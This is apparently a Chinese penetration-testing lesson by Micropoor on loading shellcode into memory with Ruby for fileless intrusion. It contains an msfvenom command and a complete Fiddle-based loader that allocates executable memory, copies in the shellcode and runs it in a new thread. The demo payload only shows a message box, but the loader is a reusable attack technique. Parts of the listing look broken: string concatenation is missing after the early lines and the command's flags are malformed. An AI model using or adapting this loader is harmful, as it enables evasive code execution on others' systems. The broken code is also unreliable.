本季是为配合msf在渗透过程中无文件渗透,提前做基础过度。也为msf插件编写做基础过度。

ruby shellcode 生成如下:

  1. msfvenom p windows/messagebox TEXT=Micropoor TITLE=Micropoor f ruby ‐‐smallest

第六十八课:基于Ruby内存加载shellcode第一季 - 图1

第六十八课:基于Ruby内存加载shellcode第一季 - 图2

附源码:

  1. require 'fiddle'
  2. require 'fiddle/import'
  3. require 'fiddle/types' 
  5. # msfvenom ‐p windows/messagebox TEXT=Micropoor TITLE=Micropoor ‐f ruby ‐‐smallest
  6. shellcode =
  7.  "\\xd9\\xeb\\x9b\\xd9\\x74\\x24\\xf4\\x31\\xd2\\xb2\\x77\\x31\\xc9\\x64" +
  8.  "\\x8b\\x71\\x30\\x8b\\x76\\x0c\\x8b\\x76\\x1c\\x8b\\x46\\x08\\x8b\\x7e" +
  9. "\\x20\\x8b\\x36\\x38\\x4f\\x18\\x75\\xf3\\x59\\x01\\xd1\\xff\\xe1\\x60" +
  10. "\\x8b\\x6c\\x24\\x24\\x8b\\x45\\x3c\\x8b\\x54\\x28\\x78\\x01\\xea\\x8b"
  11. "\\x4a\\x18\\x8b\\x5a\\x20\\x01\\xeb\\xe3\\x34\\x49\\x8b\\x34\\x8b\\x01"
  12. "\\xee\\x31\\xff\\x31\\xc0\\xfc\\xac\\x84\\xc0\\x74\\x07\\xc1\\xcf\\x0d"
  13. "\\x01\\xc7\\xeb\\xf4\\x3b\\x7c\\x24\\x28\\x75\\xe1\\x8b\\x5a\\x24\\x01"
  14. "\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01"
  15. "\\xe8\\x89\\x44\\x24\\x1c\\x61\\xc3\\xb2\\x08\\x29\\xd4\\x89\\xe5\\x89"
  16. "\\xc2\\x68\\x8e\\x4e\\x0e\\xec\\x52\\xe8\\x9f\\xff\\xff\\xff\\x89\\x45"
  17. "\\x04\\xbb\\x7e\\xd8\\xe2\\x73\\x87\\x1c\\x24\\x52\\xe8\\x8e\\xff\\xff"
  18. "\\xff\\x89\\x45\\x08\\x68\\x6c\\x6c\\x20\\x41\\x68\\x33\\x32\\x2e\\x64"
  19. "\\x68\\x75\\x73\\x65\\x72\\x30\\xdb\\x88\\x5c\\x24\\x0a\\x89\\xe6\\x56"
  20. "\\xff\\x55\\x04\\x89\\xc2\\x50\\xbb\\xa8\\xa2\\x4d\\xbc\\x87\\x1c\\x24"
  21. "\\x52\\xe8\\x5f\\xff\\xff\\xff\\x68\\x72\\x58\\x20\\x20\\x68\\x6f\\x70"
  22. "\\x6f\\x6f\\x68\\x4d\\x69\\x63\\x72\\x31\\xdb\\x88\\x5c\\x24\\x09\\x89"
  23. "\\xe3\\x68\\x72\\x58\\x20\\x20\\x68\\x6f\\x70\\x6f\\x6f\\x68\\x4d\\x69"
  24. "\\x63\\x72\\x31\\xc9\\x88\\x4c\\x24\\x09\\x89\\xe1\\x31\\xd2\\x52\\x53"
  25. "\\x51\\x52\\xff\\xd0\\x31\\xc0\\x50\\xff\\x55\\x08" 
  28. include Fiddle 
  30. kernel32 = Fiddle.dlopen('kernel32') 
  32. ptr = Function.new(kernel32['VirtualAlloc'], [4,4,4,4], 4).call(0, shellcode.size, 0x3000, 0x40)
  34. Function.new(kernel32['VirtualProtect'], [4,4,4,4], 4).call(ptr, shellcode.size, 0, 0)
  36. buf = Fiddle::Pointer[shellcode] 
  38. Function.new(kernel32['RtlMoveMemory'], [4, 4, 4],4).call(ptr, buf, shellcode.size)
  40. thread = Function.new(kernel32['CreateThread'],[4,4,4,4,4,4], 4).call(0, 0, ptr, 0, 0, 0) 
  42. Function.new(kernel32['WaitForSingleObject'], [4,4], 4).call(thread, 1)

Micropoor